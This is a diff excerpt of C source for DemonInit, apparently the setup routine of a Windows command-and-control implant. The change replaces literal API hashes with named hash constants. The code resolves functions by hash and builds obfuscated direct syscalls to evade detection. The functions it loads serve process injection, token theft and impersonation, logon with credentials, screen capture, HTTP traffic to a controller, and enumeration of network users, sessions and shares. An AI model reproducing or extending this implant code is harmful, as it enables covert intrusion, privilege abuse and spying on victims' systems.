Instance.Win32.SystemTimeToTzSpecificLocalTime = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_SystemTimeToTzSpecificLocalTime );
Instance.Win32.RemoveDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_RemoveDirectoryW );
Instance.Win32.DeleteFileW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_DeleteFileW );
Instance.Win32.CreateDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateDirectoryW );
Instance.Win32.CopyFileW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CopyFileW );
Instance.Win32.InitializeProcThreadAttributeList = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_InitializeProcThreadAttributeList );
Instance.Win32.UpdateProcThreadAttribute = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_UpdateProcThreadAttribute );
Instance.Win32.SetCurrentDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_SetCurrentDirectoryW );
Instance.Win32.Wow64DisableWow64FsRedirection = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_Wow64DisableWow64FsRedirection );
Instance.Win32.Wow64RevertWow64FsRedirection = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_Wow64RevertWow64FsRedirection );
Instance.Win32.GetModuleHandleA = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetModuleHandleA );
}
// Check if it's min win xp. no one uses win 95 and below (from Meterpreter)
@@ -392,33 +392,33 @@ VOID DemonInit( VOID )
HMODULE pNtdll = SyscallLdrNtdll();
DWORD SyscallCounter = SyscallsExtract( pNtdll, Syscalls );
Instance.Syscall.NtOpenProcess = SyscallsObf( Syscalls, SyscallCounter, 0x5003c058 );
Instance.Syscall.NtQueryInformationProcess = SyscallsObf( Syscalls, SyscallCounter, 0xd034fc62 );
Instance.Syscall.NtQuerySystemInformation = SyscallsObf( Syscalls, SyscallCounter, 0xee4f73a8 );
Instance.Syscall.NtAllocateVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, 0x6793c34c );
Instance.Syscall.NtQueueApcThread = SyscallsObf( Syscalls, SyscallCounter, 0xd4612238 );
Instance.Syscall.NtOpenThread = SyscallsObf( Syscalls, SyscallCounter, 0xfb8a31d1 );
Instance.Syscall.NtResumeThread = SyscallsObf( Syscalls, SyscallCounter, 0x2c7b3d30 );
Instance.Syscall.NtSuspendThread = SyscallsObf( Syscalls, SyscallCounter, 0x50febd61 );
Instance.Syscall.NtCreateEvent = SyscallsObf( Syscalls, SyscallCounter, 0xca58747d );
Instance.Syscall.NtDuplicateObject = SyscallsObf( Syscalls, SyscallCounter, 0x2388ee19 );
Instance.Syscall.NtGetContextThread = SyscallsObf( Syscalls, SyscallCounter, 0x9e0e1a44 );
Instance.Syscall.NtSetContextThread = SyscallsObf( Syscalls, SyscallCounter, 0x308be0d0 );
Instance.Syscall.NtWaitForSingleObject = SyscallsObf( Syscalls, SyscallCounter, 0x4c6dc63c );
Instance.Syscall.NtAlertResumeThread = SyscallsObf( Syscalls, SyscallCounter, 0x482e8408 );
Instance.Syscall.NtSignalAndWaitForSingleObject = SyscallsObf( Syscalls, SyscallCounter, 0x7bdd15cd );
Instance.Syscall.NtTestAlert = SyscallsObf( Syscalls, SyscallCounter, 0x7915b7df );
Instance.Syscall.NtCreateThreadEx = SyscallsObf( Syscalls, SyscallCounter, 0xcb0c2130 );
Instance.Syscall.NtOpenProcessToken = SyscallsObf( Syscalls, SyscallCounter, 0x7bd07459 );
Instance.Syscall.NtDuplicateToken = SyscallsObf( Syscalls, SyscallCounter, 0x3000ecc3 );
Instance.Syscall.NtProtectVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, 0x82962c8 );
Instance.Syscall.NtTerminateThread = SyscallsObf( Syscalls, SyscallCounter, 0xac3c9dc8 );
Instance.Syscall.NtWriteVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, 0x95f3a792 );
Instance.Syscall.NtContinue = SyscallsObf( Syscalls, SyscallCounter, 0x780a612c );
Instance.Syscall.NtReadVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, 0xc24062e3 );
Instance.Syscall.NtFreeVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, 0x471aa7e9 );
Instance.Syscall.NtQueryVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, 0xe39d8e5d );
Instance.Syscall.NtQueryInformationToken = SyscallsObf( Syscalls, SyscallCounter, 0x2ce5a244 );
Instance.Syscall.NtOpenProcess = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtOpenProcess );
Instance.Syscall.NtQueryInformationProcess = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtQueryInformationProcess );
Instance.Syscall.NtQuerySystemInformation = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtQuerySystemInformation );
Instance.Syscall.NtAllocateVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtAllocateVirtualMemory );
Instance.Syscall.NtQueueApcThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtQueueApcThread );
Instance.Syscall.NtOpenThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtOpenThread );
Instance.Syscall.NtResumeThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtResumeThread );
Instance.Syscall.NtSuspendThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtSuspendThread );
Instance.Syscall.NtCreateEvent = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtCreateEvent );
Instance.Syscall.NtDuplicateObject = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtDuplicateObject );
Instance.Syscall.NtGetContextThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtGetContextThread );
Instance.Syscall.NtSetContextThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtSetContextThread );
Instance.Syscall.NtWaitForSingleObject = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtWaitForSingleObject );
Instance.Syscall.NtAlertResumeThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtAlertResumeThread );
Instance.Syscall.NtSignalAndWaitForSingleObject = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtSignalAndWaitForSingleObject );
Instance.Syscall.NtTestAlert = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtTestAlert );
Instance.Syscall.NtCreateThreadEx = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtCreateThreadEx );
Instance.Syscall.NtOpenProcessToken = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtOpenProcessToken );
Instance.Syscall.NtDuplicateToken = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtDuplicateToken );
Instance.Syscall.NtProtectVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtProtectVirtualMemory );
Instance.Syscall.NtTerminateThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtTerminateThread );
Instance.Syscall.NtWriteVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtWriteVirtualMemory );
Instance.Syscall.NtContinue = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtContinue );
Instance.Syscall.NtReadVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtReadVirtualMemory );
Instance.Syscall.NtFreeVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtFreeVirtualMemory );
Instance.Syscall.NtQueryVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtQueryVirtualMemory );
Instance.Syscall.NtQueryInformationToken = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtQueryInformationToken );
MemSet( Syscalls, 0, sizeof( SYSCALL_STUB ) * MAX_NUMBER_OF_SYSCALLS );
Instance.Win32.LocalFree( Syscalls );
@@ -432,34 +432,34 @@ VOID DemonInit( VOID )
#endif
{
PUTS( "Using Native functions..." )
Instance.Syscall.NtOpenProcess = LdrFunctionAddr( Instance.Modules.Ntdll, 0x5003c058 );
Instance.Syscall.NtQueryInformationProcess = LdrFunctionAddr( Instance.Modules.Ntdll, 0xd034fc62 );
Instance.Syscall.NtQuerySystemInformation = LdrFunctionAddr( Instance.Modules.Ntdll, 0xee4f73a8 );
Instance.Syscall.NtAllocateVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, 0x6793c34c );
Instance.Syscall.NtQueueApcThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0xd4612238 );
Instance.Syscall.NtOpenThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0xfb8a31d1 );
Instance.Syscall.NtResumeThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0x2c7b3d30 );
Instance.Syscall.NtSuspendThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0x50febd61 );
Instance.Syscall.NtCreateEvent = LdrFunctionAddr( Instance.Modules.Ntdll, 0xca58747d );
Instance.Syscall.NtDuplicateObject = LdrFunctionAddr( Instance.Modules.Ntdll, 0x2388ee19 );
Instance.Syscall.NtGetContextThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0x9e0e1a44 );
Instance.Syscall.NtSetContextThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0x308be0d0 );
Instance.Syscall.NtWaitForSingleObject = LdrFunctionAddr( Instance.Modules.Ntdll, 0x4c6dc63c );
Instance.Syscall.NtAlertResumeThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0x482e8408 );
Instance.Syscall.NtSignalAndWaitForSingleObject = LdrFunctionAddr( Instance.Modules.Ntdll, 0x7bdd15cd );
Instance.Syscall.NtTestAlert = LdrFunctionAddr( Instance.Modules.Ntdll, 0x7915b7df );
Instance.Syscall.NtCreateThreadEx = LdrFunctionAddr( Instance.Modules.Ntdll, 0xcb0c2130 );
Instance.Syscall.NtOpenProcessToken = LdrFunctionAddr( Instance.Modules.Ntdll, 0x7bd07459 );
Instance.Syscall.NtDuplicateToken = LdrFunctionAddr( Instance.Modules.Ntdll, 0x3000ecc3 );
Instance.Syscall.NtProtectVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, 0x82962c8 );
Instance.Syscall.NtTerminateThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0xac3c9dc8 );
Instance.Syscall.NtWriteVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, 0x95f3a792 );
Instance.Syscall.NtContinue = LdrFunctionAddr( Instance.Modules.Ntdll, 0x780a612c );
Instance.Syscall.NtReadVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, 0xc24062e3 );
Instance.Syscall.NtFreeVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, 0x471aa7e9 );
Instance.Syscall.NtQueryVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, 0xe39d8e5d );
Instance.Syscall.NtQueryInformationToken = LdrFunctionAddr( Instance.Modules.Ntdll, 0x2ce5a244 );
Instance.Syscall.NtQueryInformationThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0xc91f149b );
Instance.Syscall.NtOpenProcess = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtOpenProcess );
Instance.Syscall.NtQueryInformationProcess = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtQueryInformationProcess );
Instance.Syscall.NtQuerySystemInformation = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtQuerySystemInformation );
Instance.Syscall.NtAllocateVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtAllocateVirtualMemory );
Instance.Syscall.NtQueueApcThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtQueueApcThread );
Instance.Syscall.NtOpenThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtOpenThread );
Instance.Syscall.NtResumeThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtResumeThread );
Instance.Syscall.NtSuspendThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtSuspendThread );
Instance.Syscall.NtCreateEvent = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtCreateEvent );
Instance.Syscall.NtDuplicateObject = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtDuplicateObject );
Instance.Syscall.NtGetContextThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtGetContextThread );
Instance.Syscall.NtSetContextThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtSetContextThread );
Instance.Syscall.NtWaitForSingleObject = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtWaitForSingleObject );
Instance.Syscall.NtAlertResumeThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtAlertResumeThread );
Instance.Syscall.NtSignalAndWaitForSingleObject = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtSignalAndWaitForSingleObject );
Instance.Syscall.NtTestAlert = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtTestAlert );
Instance.Syscall.NtCreateThreadEx = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtCreateThreadEx );
Instance.Syscall.NtOpenProcessToken = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtOpenProcessToken );
Instance.Syscall.NtDuplicateToken = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtDuplicateToken );
Instance.Syscall.NtProtectVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtProtectVirtualMemory );
Instance.Syscall.NtTerminateThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtTerminateThread );
Instance.Syscall.NtWriteVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtWriteVirtualMemory );
Instance.Syscall.NtContinue = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtContinue );
Instance.Syscall.NtReadVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtReadVirtualMemory );
Instance.Syscall.NtFreeVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtFreeVirtualMemory );
Instance.Syscall.NtQueryVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtQueryVirtualMemory );
Instance.Syscall.NtQueryInformationToken = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtQueryInformationToken );
Instance.Syscall.NtQueryInformationThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtQueryInformationThread );
}
ModuleName[ 0 ] = 'A';
@@ -631,86 +631,86 @@ VOID DemonInit( VOID )
if ( Instance.Modules.Advapi32 )
{
Instance.Win32.GetTokenInformation = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_GetTokenInformation );
Instance.Win32.CreateProcessWithTokenW = LdrFunctionAddr( Instance.Modules.Advapi32, 0x94e76e4c );
Instance.Win32.CreateProcessWithLogonW = LdrFunctionAddr( Instance.Modules.Advapi32, 0x823c224a );
Instance.Win32.CreateProcessWithTokenW = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_CreateProcessWithTokenW );
Instance.Win32.CreateProcessWithLogonW = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_CreateProcessWithLogonW );
Instance.Win32.RevertToSelf = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_RevertToSelf );
Instance.Win32.GetUserNameA = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_GetUserNameA );
Instance.Win32.LogonUserA = LdrFunctionAddr( Instance.Modules.Advapi32, 0x609d56e4 );
Instance.Win32.LookupPrivilegeValueA = LdrFunctionAddr( Instance.Modules.Advapi32, 0xbbae6e84 );
Instance.Win32.LogonUserA = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_LogonUserA );
Instance.Win32.LookupPrivilegeValueA = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_LookupPrivilegeValueA );
Instance.Win32.LookupAccountSidA = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_LookupAccountSidA );
Instance.Win32.OpenThreadToken = LdrFunctionAddr( Instance.Modules.Advapi32, 579177116578842096 );
Instance.Win32.OpenProcessToken = LdrFunctionAddr( Instance.Modules.Advapi32, 0xc57bd097 );
Instance.Win32.ImpersonateLoggedOnUser = LdrFunctionAddr( Instance.Modules.Advapi32, 0xa6ffd55a );
Instance.Win32.AdjustTokenPrivileges = LdrFunctionAddr( Instance.Modules.Advapi32, 0xce4cd9cb );
Instance.Win32.LookupPrivilegeNameA = LdrFunctionAddr( Instance.Modules.Advapi32, 0xe6176fe8 );
Instance.Win32.SystemFunction032 = LdrFunctionAddr( Instance.Modules.Advapi32, 0xcccf3585 );
Instance.Win32.FreeSid = LdrFunctionAddr( Instance.Modules.Advapi32, 0x2174ce07 );
Instance.Win32.SetSecurityDescriptorSacl = LdrFunctionAddr( Instance.Modules.Advapi32, 0x4a8307ab );
Instance.Win32.SetSecurityDescriptorDacl = LdrFunctionAddr( Instance.Modules.Advapi32, 0x4a7acdfc );
Instance.Win32.InitializeSecurityDescriptor = LdrFunctionAddr( Instance.Modules.Advapi32, 0x70670cee );
Instance.Win32.AddMandatoryAce = LdrFunctionAddr( Instance.Modules.Advapi32, 0x248cc186 );
Instance.Win32.InitializeAcl = LdrFunctionAddr( Instance.Modules.Advapi32, 0x62cac4c7 );
Instance.Win32.AllocateAndInitializeSid = LdrFunctionAddr( Instance.Modules.Advapi32, 0x57a4ccf );
Instance.Win32.SetEntriesInAclW = LdrFunctionAddr( Instance.Modules.Advapi32, 0xe2d6b8e9 );
Instance.Win32.SetThreadToken = LdrFunctionAddr( Instance.Modules.Advapi32, 0x575b17ca );
Instance.Win32.OpenThreadToken = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_OpenThreadToken );
Instance.Win32.OpenProcessToken = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_OpenProcessToken );
Instance.Win32.ImpersonateLoggedOnUser = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_ImpersonateLoggedOnUser );
Instance.Win32.AdjustTokenPrivileges = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_AdjustTokenPrivileges );
Instance.Win32.LookupPrivilegeNameA = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_LookupPrivilegeNameA );
Instance.Win32.SystemFunction032 = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_SystemFunction032 );
Instance.Win32.FreeSid = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_FreeSid );
Instance.Win32.SetSecurityDescriptorSacl = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_SetSecurityDescriptorSacl );
Instance.Win32.SetSecurityDescriptorDacl = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_SetSecurityDescriptorDacl );
Instance.Win32.InitializeSecurityDescriptor = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_InitializeSecurityDescriptor );
Instance.Win32.AddMandatoryAce = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_AddMandatoryAce );
Instance.Win32.InitializeAcl = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_InitializeAcl );
Instance.Win32.AllocateAndInitializeSid = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_AllocateAndInitializeSid );
Instance.Win32.SetEntriesInAclW = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_SetEntriesInAclW );
Instance.Win32.SetThreadToken = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_SetThreadToken );
PUTS( "Loaded Advapi32 functions" )
}
if ( Instance.Modules.Oleaut32 )
{
Instance.Win32.SafeArrayAccessData = LdrFunctionAddr( Instance.Modules.Oleaut32, 2675336209888825647 );
Instance.Win32.SafeArrayUnaccessData = LdrFunctionAddr( Instance.Modules.Oleaut32, 18329906161741280562 );
Instance.Win32.SafeArrayCreate = LdrFunctionAddr( Instance.Modules.Oleaut32, 3571287155138900375 );
Instance.Win32.SafeArrayPutElement = LdrFunctionAddr( Instance.Modules.Oleaut32, 2676058380407465830 );
Instance.Win32.SafeArrayCreateVector = LdrFunctionAddr( Instance.Modules.Oleaut32, 17426458116918762890 );
Instance.Win32.SafeArrayDestroy = LdrFunctionAddr( Instance.Modules.Oleaut32, 7172011678126394509 );
Instance.Win32.SysAllocString = LdrFunctionAddr( Instance.Modules.Oleaut32, 3847978704220612774 );
Instance.Win32.SafeArrayAccessData = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SafeArrayAccessData );
Instance.Win32.SafeArrayUnaccessData = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SafeArrayUnaccessData );
Instance.Win32.SafeArrayCreate = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SafeArrayCreate );
Instance.Win32.SafeArrayPutElement = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SafeArrayPutElement );
Instance.Win32.SafeArrayCreateVector = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SafeArrayCreateVector );
Instance.Win32.SafeArrayDestroy = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SafeArrayDestroy );
Instance.Win32.SysAllocString = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SysAllocString );
PUTS( "Loaded Oleaut32 functions" )
}
if ( Instance.Modules.Shell32 )
{
Instance.Win32.CommandLineToArgvW = LdrFunctionAddr( Instance.Modules.Shell32, 0x8d607276 );
Instance.Win32.CommandLineToArgvW = LdrFunctionAddr( Instance.Modules.Shell32, FuncHash_CommandLineToArgvW );
PUTS( "Loaded Shell32 functions" )
}
if ( Instance.Modules.Msvcrt )
{
Instance.Win32.vsnprintf = LdrFunctionAddr( Instance.Modules.Msvcrt, 0xe61d840f );
Instance.Win32.vsnprintf = LdrFunctionAddr( Instance.Modules.Msvcrt, FuncHash_vsnprintf );
PUTS( "Loaded Msvcrt functions" )
}
if ( Instance.Modules.User32 )
{
Instance.Win32.ShowWindow = LdrFunctionAddr( Instance.Modules.User32, 8245429827274884638 );
Instance.Win32.GetSystemMetrics = LdrFunctionAddr( Instance.Modules.User32, 0xa988c1a1 );
Instance.Win32.GetDC = LdrFunctionAddr( Instance.Modules.User32, 0xd3d24ac );
Instance.Win32.ReleaseDC = LdrFunctionAddr( Instance.Modules.User32, 0xe43871cd );
Instance.Win32.ShowWindow = LdrFunctionAddr( Instance.Modules.User32, FuncHash_ShowWindow );
Instance.Win32.GetSystemMetrics = LdrFunctionAddr( Instance.Modules.User32, FuncHash_GetSystemMetrics );
Instance.Win32.GetDC = LdrFunctionAddr( Instance.Modules.User32, FuncHash_GetDC );
Instance.Win32.ReleaseDC = LdrFunctionAddr( Instance.Modules.User32, FuncHash_ReleaseDC );
PUTS( "Loaded User32 functions" )
}
if ( Instance.Modules.Gdi32 )
{
Instance.Win32.GetCurrentObject = LdrFunctionAddr( Instance.Modules.Gdi32, 0xd41e47df );
Instance.Win32.GetObjectW = LdrFunctionAddr( Instance.Modules.Gdi32, 0x512b413 );
Instance.Win32.CreateCompatibleDC = LdrFunctionAddr( Instance.Modules.Gdi32, 0xa05cbae0 );
Instance.Win32.CreateDIBSection = LdrFunctionAddr( Instance.Modules.Gdi32, 0xfff5b73d );
Instance.Win32.SelectObject = LdrFunctionAddr( Instance.Modules.Gdi32, 0x7cf4fd7c );
Instance.Win32.BitBlt = LdrFunctionAddr( Instance.Modules.Gdi32, 0xa9804e46 );
Instance.Win32.DeleteObject = LdrFunctionAddr( Instance.Modules.Gdi32, 0xcc68186f );
Instance.Win32.DeleteDC = LdrFunctionAddr( Instance.Modules.Gdi32, 0x9f3bef5f );
Instance.Win32.GetCurrentObject = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_GetCurrentObject );
Instance.Win32.GetObjectW = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_GetObjectW );
Instance.Win32.CreateCompatibleDC = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_CreateCompatibleDC );
Instance.Win32.CreateDIBSection = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_CreateDIBSection );
Instance.Win32.SelectObject = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_SelectObject );
Instance.Win32.BitBlt = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_BitBlt );
Instance.Win32.DeleteObject = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_DeleteObject );
Instance.Win32.DeleteDC = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_DeleteDC );
PUTS( "Loaded Gdi32 functions" )
}
if ( Instance.Modules.KernelBase )
{
Instance.Win32.SetProcessValidCallTargets = LdrFunctionAddr( Instance.Modules.KernelBase, 0xbb6970d6 );
Instance.Win32.SetProcessValidCallTargets = LdrFunctionAddr( Instance.Modules.KernelBase, FuncHash_SetProcessValidCallTargets );
PUTS( "Loaded KernelBase functions" )
}
@@ -719,18 +719,18 @@ VOID DemonInit( VOID )
#ifdef TRANSPORT_HTTP
if ( Instance.Modules.WinHttp )
{
Instance.Win32.WinHttpOpen = LdrFunctionAddr( Instance.Modules.WinHttp, 0x5e4f39e5 );
Instance.Win32.WinHttpConnect = LdrFunctionAddr( Instance.Modules.WinHttp, 0x7242c17d );
Instance.Win32.WinHttpOpenRequest = LdrFunctionAddr( Instance.Modules.WinHttp, 0xeab7b9ce );
Instance.Win32.WinHttpSetOption = LdrFunctionAddr( Instance.Modules.WinHttp, 0xa18b94f8 );
Instance.Win32.WinHttpCloseHandle = LdrFunctionAddr( Instance.Modules.WinHttp, 0x36220cd5 );
Instance.Win32.WinHttpSendRequest = LdrFunctionAddr( Instance.Modules.WinHttp, 0xb183faa6 );
Instance.Win32.WinHttpAddRequestHeaders = LdrFunctionAddr( Instance.Modules.WinHttp, 0xed7fcb41 );
Instance.Win32.WinHttpReceiveResponse = LdrFunctionAddr( Instance.Modules.WinHttp, 0x146c4925 );
Instance.Win32.WinHttpWebSocketCompleteUpgrade = LdrFunctionAddr( Instance.Modules.WinHttp, 0x58929db );
Instance.Win32.WinHttpQueryDataAvailable = LdrFunctionAddr( Instance.Modules.WinHttp, 0x34cb8684 );
Instance.Win32.WinHttpReadData = LdrFunctionAddr( Instance.Modules.WinHttp, 0x7195e4e9 );
Instance.Win32.WinHttpQueryHeaders = LdrFunctionAddr( Instance.Modules.WinHttp, 0x389cefa5 );
Instance.Win32.WinHttpOpen = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpOpen );
Instance.Win32.WinHttpConnect = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpConnect );
Instance.Win32.WinHttpOpenRequest = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpOpenRequest );
Instance.Win32.WinHttpSetOption = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpSetOption );
Instance.Win32.WinHttpCloseHandle = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpCloseHandle );
Instance.Win32.WinHttpSendRequest = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpSendRequest );
Instance.Win32.WinHttpAddRequestHeaders = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpAddRequestHeaders );
Instance.Win32.WinHttpReceiveResponse = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpReceiveResponse );
Instance.Win32.WinHttpWebSocketCompleteUpgrade = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpWebSocketCompleteUpgrade );
Instance.Win32.WinHttpQueryDataAvailable = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpQueryDataAvailable );
Instance.Win32.WinHttpReadData = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpReadData );
Instance.Win32.WinHttpQueryHeaders = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpQueryHeaders );
PUTS( "Loaded WinHttp functions" )
}
@@ -738,40 +738,40 @@ VOID DemonInit( VOID )
if ( Instance.Modules.Mscoree )
{
Instance.Win32.CLRCreateInstance = LdrFunctionAddr( Instance.Modules.Mscoree, 10918823944048432655 );
Instance.Win32.CLRCreateInstance = LdrFunctionAddr( Instance.Modules.Mscoree, FuncHash_CLRCreateInstance );
}
if ( Instance.Modules.Iphlpapi )
{
Instance.Win32.GetAdaptersInfo = LdrFunctionAddr( Instance.Modules.Iphlpapi, 0xbc950fc5 );
Instance.Win32.GetAdaptersInfo = LdrFunctionAddr( Instance.Modules.Iphlpapi, FuncHash_GetAdaptersInfo );
}
if ( Instance.Modules.NetApi32 )
{
Instance.Win32.NetLocalGroupEnum = LdrFunctionAddr( Instance.Modules.NetApi32, 0x2c3fa6b9 );
Instance.Win32.NetGroupEnum = LdrFunctionAddr( Instance.Modules.NetApi32, 0xb278fc6e );
Instance.Win32.NetUserEnum = LdrFunctionAddr( Instance.Modules.NetApi32, 0xe84c1c20 );
Instance.Win32.NetWkstaUserEnum = LdrFunctionAddr( Instance.Modules.NetApi32, 0x3f45a8a );
Instance.Win32.NetSessionEnum = LdrFunctionAddr( Instance.Modules.NetApi32, 0x80edcd45 );
Instance.Win32.NetShareEnum = LdrFunctionAddr( Instance.Modules.NetApi32, 0xb0461db4 );
Instance.Win32.NetApiBufferFree = LdrFunctionAddr( Instance.Modules.NetApi32, 0x83e6be2 );
Instance.Win32.NetLocalGroupEnum = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetLocalGroupEnum );
Instance.Win32.NetGroupEnum = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetGroupEnum );
Instance.Win32.NetUserEnum = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetUserEnum );
